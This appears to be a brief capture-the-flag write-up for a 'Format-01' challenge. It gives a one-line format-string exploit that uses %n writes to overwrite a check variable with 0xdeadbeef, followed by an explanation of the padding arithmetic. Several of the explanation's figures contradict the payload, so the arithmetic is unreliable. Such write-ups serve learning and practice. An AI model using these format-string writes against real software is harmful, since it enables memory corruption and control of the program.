Format-01
Ok in this Problem we have to modify a variable using only format string vulnerability .
So the exploit is ./format01 $(python -c 'print "\x88\xd0\xff\xff"+"\x8a\xd0\xff\xff"+"%48871u"')%9\$n-%8124u-%10\$n
We use %n specifier which writes data to an address pointed by
%<num>\$n( here %9\$n is our buffer and it points to check variable) and
writes number of bytes written so far to that address and %<number>u pad our bytes written .
so as 0xdeadbeef is huge value to write we split it into two (16 bits )
0xbeef-(%4887)- 4 as we already have 4 bytes of addresses and 0xdead (%8128)-4
and that's it supply the payload and have fun :)